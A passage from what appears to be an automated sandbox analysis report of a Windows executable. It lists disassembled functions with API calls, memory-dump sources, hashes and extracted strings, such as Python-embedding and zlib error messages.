                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1017C61A0874240EA04DB579900069AB95FF96FF8B284631DE6CD7BD7CEBCD0218740
                                                                                                                                                                                                                            Function 00007FF6029A6D74 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: fab2e249b25d53bb67800cecac5c692b3ea015b3a36097e2c80a0fad169f59f6
                                                                                                                                                                                                                            • Instruction ID: aa2b675e383e9346c5cf250f6a2f55815bea3bc577ec67cfed55746d7bf86068
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fab2e249b25d53bb67800cecac5c692b3ea015b3a36097e2c80a0fad169f59f6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63019220E0D74240FFA06B13AD412796E98AF447DCF3C0638E95DC26C7CEECE8418281
                                                                                                                                                                                                                            Function 00007FF6029B6C54 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029AC47C: HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6029B21BB,?,?,?,00007FF6029A8DD7,?,?,?,00007FF6029A8CCD,?,?,?,00007FF6029A90AE), ref: 00007FF6029B6CC1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2177240990-0
                                                                                                                                                                                                                            • Opcode ID: 5fcde9dfe95d2ac31e40c71ecfdf00dd34f302a439c3e0ab28923699d890222d
                                                                                                                                                                                                                            • Instruction ID: 5b8a58bbdfa280c03f83d63b1071c3caf4e99b9facdc79b2bba638c1535f66ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fcde9dfe95d2ac31e40c71ecfdf00dd34f302a439c3e0ab28923699d890222d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96016D10F0C60340FFA66B639A4027919989F96BA9F388230DE6EC66C7EDECF4404240
                                                                                                                                                                                                                            Function 00007FF6029A70B0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 8d1f0483c66bd1ec4805205e2bf6f302e22bbc788374880d8806bfb2c298db30
                                                                                                                                                                                                                            • Instruction ID: 79bf12cbe02b09602174ce1147ffd2beae1808090c678ab5f35f73a1efe829c3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1f0483c66bd1ec4805205e2bf6f302e22bbc788374880d8806bfb2c298db30
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBE017A0F0834782FB947AE389C72BC59149F2938CF349434DA09D72C3DEDC684496A1
                                                                                                                                                                                                                            Function 00007FF6029ADA18 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF6029AA1AA,?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A), ref: 00007FF6029ADA6D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            • Opcode ID: 888c9fa13720e03ad5c0abb50cdf5d35c7c8545cd387c51cc1cc410940e68aac
                                                                                                                                                                                                                            • Instruction ID: 3007db496a32ef19f30df65eb56d6db1bab3ec6c9f15bfb336126a98f4e8699c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 888c9fa13720e03ad5c0abb50cdf5d35c7c8545cd387c51cc1cc410940e68aac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6F06D94F0D30654FF5957A399513B41A909F95B88F6C9430CD0FC6AD7DEECE58082A0
                                                                                                                                                                                                                            Function 00007FF6029AC47C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            • Opcode ID: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction ID: 813fd263b8c7434dfa10ab1665f6b39bce1b60ec868ca1c8abfc976c563b0b4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F0EC01F0D30386FF1827B3480127419D09F547A8F380631DC2ECA6C3DEECA04082A4

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 00007FF602995090 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995106
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299512B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995153
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299517B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951A3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951CB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951F3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                            • Opcode ID: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction ID: 8d03703544bf227b1785009ca476e9f0aaa7ce48e410fdc29011545e5a774c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B12B464D0EB0394FA17DB5BA9601B52BA0EF0976CFB51435CC4E822A3EFFCB5589241
                                                                                                                                                                                                                            Function 00007FF6029B2E2C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                            • Opcode ID: d9dc8ea0acb79e4d9ef06eae9a23494848faa6b1b0caf618c0fc867066338a3a
                                                                                                                                                                                                                            • Instruction ID: fa1493fbf93f4063572f78fa11e72b40aa03bb8182008ff223a01974341b7803
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9dc8ea0acb79e4d9ef06eae9a23494848faa6b1b0caf618c0fc867066338a3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17B2D272E182928BE726CE66D6407FD3BA1FF4474CF605135DA0D97A86DFB8A900CB44
                                                                                                                                                                                                                            Function 00007FF602999D2D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                            • Opcode ID: 4ac7e92f7a16b85862356adff5b5bf67b866f2e7e6eb7a58b17fdcce6a0c6e8c
                                                                                                                                                                                                                            • Instruction ID: 0e14b480c58b883aad81e78dccfa5270cfefbd633867f225b2065b569fa43c4f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ac7e92f7a16b85862356adff5b5bf67b866f2e7e6eb7a58b17fdcce6a0c6e8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7352F472A186A68BE7648F1AC458B7D3FA9FF45358F214139EA4A83781DF7DD850CB00
                                                                                                                                                                                                                            Function 00007FF60299C19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                            • Opcode ID: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction ID: b3c8c0dcc5573f37e12b5d3b13e0f0639a4fc5203dfbe35ad54bfc16f106b6a8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F318372A08B818AEB608F65E8403ED7760FB88708F14403ADB4E87B95EF78C548C714
                                                                                                                                                                                                                            Function 00007FF6029929E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                            • Opcode ID: d00ec6383bd8b73c4dfe21231a51a90c9ec44ada26203f5ebac8043cfa901d1d
                                                                                                                                                                                                                            • Instruction ID: 2baa6b743cd14df1a889a36e9120847630a5caa08db5a6047544937fc12f6445
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d00ec6383bd8b73c4dfe21231a51a90c9ec44ada26203f5ebac8043cfa901d1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2217172618B8192E720DB16F4502EA77A4FF88788F500136EBCD93A99DFBCD156CB40
                                                                                                                                                                                                                            Function 00007FF6029A9494 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction ID: 473e776ca4a0da1be46635b09a98adb17e9258ed79e37ce808dc9466ed9fa121
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44317332A18B8186EB64CF26E8402AE77A4FF89758F640135EA9D83B55DF7CD155CB00
                                                                                                                                                                                                                            Function 00007FF6029B05F4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                            • Opcode ID: 1c39f03ef33399cc6d1c661914213a4cb72856eeaff424b861eea07ba9b08e80
                                                                                                                                                                                                                            • Instruction ID: 43dec1153114443a90cbb98cffd05cc0ef5a5f2f3dfc8f0d009abe95d52661df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c39f03ef33399cc6d1c661914213a4cb72856eeaff424b861eea07ba9b08e80
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BB1D622B1869241FE629B27E6001BE6B90FF54BE8F645131EA5D87BC6DFBCE441C740
                                                                                                                                                                                                                            Function 00007FF60299C080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction ID: 2e52023be74b661de9da9fea0a7cd0cfabb313305cf0ce80c5604d4f41072ec3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
